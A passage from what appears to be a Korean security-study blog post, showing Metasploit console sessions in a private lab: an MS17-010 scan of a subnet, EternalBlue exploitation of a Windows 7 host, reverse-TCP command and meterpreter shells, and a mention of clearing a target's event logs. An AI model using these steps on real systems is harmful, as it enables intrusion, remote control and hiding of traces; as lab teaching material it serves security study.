[*] 192.168.20.201 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/handler) > exit
root@kali:~#
7) 타켓 시스템(Windows2008) 로그 삭제 확인
- 이벤트 뷰어 -> F5(새로고침) -> 로그 삭제 확인
17. 'SMB' 취약점을 이용한 Reverse_TCP 공격
- 'ms17_010' SMB 취약점 : 원격 코드가 실행되어 백도어 및 권한 상승 문제가 발생한다.
- 참고 사이트 : https://www.exploit-db.com/exploits/42315
1) 'smb_ms17_010'을 이용한 SMB 취약점 스캔
root@kali:~# msfconsole -q
msf >
msf > search smb_ms17_010
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true yes Check for architecture on vulnerable hosts
CHECK_DOPU true yes Check for DOUBLEPULSAR on vulnerable hosts
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.20.0/24
rhosts => 192.168.20.0/24
msf auxiliary(scanner/smb/smb_ms17_010) > set threads 16
threads => 16
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
[-] 192.168.20.1:445 - Host does NOT appear vulnerable.
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 54 of 256 hosts (21% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[+] 192.168.20.201:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.20.204:445 - Host does NOT appear vulnerable.
[+] 192.168.20.202:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > back
msf >
2) 타겟 시스템(Windows7)을 대상으로 'ms17_010_eternalblue'을 이용한 SMB 취약점 공격
msf > search ms17_010_eternalblue
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.20.202
rhost => 192.168.20.202
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] 192.168.20.202:445 - Connecting to target for exploitation.
[+] 192.168.20.202:445 - Connection established for exploitation.
[+] 192.168.20.202:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.20.202:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.20.202:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.20.202:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.20.202:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.20.202:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.20.202:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.20.202:445 - Sending all but last fragment of exploit packet
[*] 192.168.20.202:445 - Starting non-paged pool grooming
[+] 192.168.20.202:445 - Sending SMBv2 buffers
[+] 192.168.20.202:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.20.202:445 - Sending final SMBv2 buffers.
[*] 192.168.20.202:445 - Sending last fragment of exploit packet!
[*] 192.168.20.202:445 - Receiving response from exploit packet
[+] 192.168.20.202:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.20.202:445 - Sending egg to corrupted connection.
[*] 192.168.20.202:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49161) at 2022-05-22 16:33:27 +0900
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
(Ctrl+C)
Abort session 1? [y/N] y
[*] 192.168.20.202 - Command shell session 1 closed. Reason: User exit
3) 'meterpreter/reverse_tcp' 페이로드 변경
msf exploit(windows/smb/ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
~ 중간 생략 ~
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.20.202 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] 192.168.20.202:445 - Connecting to target for exploitation.
[+] 192.168.20.202:445 - Connection established for exploitation.
[+] 192.168.20.202:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.20.202:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.20.202:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.20.202:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.20.202:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.20.202:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.20.202:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.20.202:445 - Sending all but last fragment of exploit packet
[*] 192.168.20.202:445 - Starting non-paged pool grooming
[+] 192.168.20.202:445 - Sending SMBv2 buffers
[+] 192.168.20.202:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.20.202:445 - Sending final SMBv2 buffers.
[*] 192.168.20.202:445 - Sending last fragment of exploit packet!
[*] 192.168.20.202:445 - Receiving response from exploit packet
[+] 192.168.20.202:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.20.202:445 - Sending egg to corrupted connection.
[*] 192.168.20.202:445 - Triggering free of corrupted buffer.
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 2 opened (192.168.20.50:4444 -> 192.168.20.202:49164) at 2022-05-22 16:41:24 +0900
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 2 closed. Reason: User exit
msf exploit(windows/smb/ms17_010_eternalblue) > exit
root@kali:~#
Ex) 타켓 시스템(Windows2008)을 대상으로 'ms17_010_eternalblue'을 이용한 SMB 취약점 공격을 실시한다.
'시스템 보안' 카테고리의 다른 글
레지스터 구조 (0) | 2022.07.06 |
---|---|
Bash Shellshock 취약점 (0) | 2022.07.03 |
nmap 스캔 도구 (0) | 2022.07.02 |
Bind&Reverse TCP (0) | 2022.06.30 |